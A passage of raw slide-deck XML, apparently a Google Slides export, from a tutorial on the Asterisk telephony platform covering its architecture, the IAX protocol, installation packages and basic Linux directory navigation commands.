      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3716" name="Google Shape;3716;p598"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6114" l="5105" r="0" t="5903"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5794400" y="1524900"/>
            <a:ext cx="3303175" cy="2311776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3717" name="Google Shape;3717;p598"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4349700" y="3491725"/>
            <a:ext cx="4701450" cy="1570275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3718" name="Google Shape;3718;p598"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6822699" y="170275"/>
            <a:ext cx="2228449" cy="635225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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2" name="Shape 3722"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3723" name="Google Shape;3723;p599"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3153" l="18769" r="19631" t="12756"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1351175" y="0"/>
            <a:ext cx="6698242" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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7" name="Shape 3727"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3728" name="Google Shape;3728;p600"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2196" l="18231" r="19416" t="14282"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1156975" y="0"/>
            <a:ext cx="6826603" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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2" name="Shape 3732"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3733" name="Google Shape;3733;p601"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1879900" y="170275"/>
            <a:ext cx="50877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Asterisk Architecture</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3734" name="Google Shape;3734;p601"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7512025" y="170275"/>
            <a:ext cx="1539126" cy="438725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3735" name="Google Shape;3735;p601"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3521" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="710835" y="764450"/>
            <a:ext cx="7815130" cy="4241376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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9" name="Shape 3739"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3740" name="Google Shape;3740;p602"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4552" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="4909113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3741" name="Google Shape;3741;p602"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6323625" y="3344400"/>
            <a:ext cx="362100" cy="826200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3742" name="Google Shape;3742;p602"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648575" y="4022150"/>
            <a:ext cx="22560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so = Shared Object</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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6" name="Shape 3746"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3747" name="Google Shape;3747;p603"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="362300" y="1341150"/>
            <a:ext cx="2627400" cy="2829925"/>
            <a:chOff x="743300" y="960150"/>
            <a:chExt cx="2627400" cy="2829925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3748" name="Google Shape;3748;p603"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="876575" y="960150"/>
              <a:ext cx="2438400" cy="2438400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3749" name="Google Shape;3749;p603"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="743300" y="3260875"/>
              <a:ext cx="26274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6AA84F"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Asterisk Server 1</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3750" name="Google Shape;3750;p603"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6077300" y="1341150"/>
            <a:ext cx="2627400" cy="2829925"/>
            <a:chOff x="743300" y="960150"/>
            <a:chExt cx="2627400" cy="2829925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3751" name="Google Shape;3751;p603"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="876575" y="960150"/>
              <a:ext cx="2438400" cy="2438400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3752" name="Google Shape;3752;p603"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="743300" y="3260875"/>
              <a:ext cx="26274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6AA84F"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Asterisk Server 2</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3753" name="Google Shape;3753;p603"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2859725" y="2569650"/>
            <a:ext cx="3276600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="stealth"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3754" name="Google Shape;3754;p603"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1954175" y="361800"/>
            <a:ext cx="50877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IAX Protocol</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3755" name="Google Shape;3755;p603"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2882525" y="2133925"/>
            <a:ext cx="3231000" cy="2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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nter </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sterisk e</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>change</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3756" name="Google Shape;3756;p603"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6822699" y="170275"/>
            <a:ext cx="2228449" cy="635225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3757" name="Google Shape;3757;p603"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446675" y="4298775"/>
            <a:ext cx="8258100" cy="57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E6700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open source protocol developed for communication between asterisk servers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="FE67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8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820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory Navigation</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Google Shape;446;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="366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 sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># To go up one level of the directory tree.</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2450">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(Change into the parent directory.)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2450">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>cd ..</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2450">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Go to the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>user's</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> $HOME directory</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2450">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>cd or cd ~</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2450">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Change to the /etc directory</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2450">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="355600" lvl="0" marL="101600" marR="101600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>cd /etc</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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1" name="Shape 3761"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3762" name="Google Shape;3762;p604"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1954175" y="361800"/>
            <a:ext cx="50877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Installing Asterisk</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3763" name="Google Shape;3763;p604"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6822699" y="170275"/>
            <a:ext cx="2228449" cy="635225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3764" name="Google Shape;3764;p604"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650950" y="1352250"/>
            <a:ext cx="8258100" cy="3540900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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Clr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Asterisk uses three main packages</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asterisk</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1155CC"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zaptel (</a:t>
            </a:r>
            <a:r>
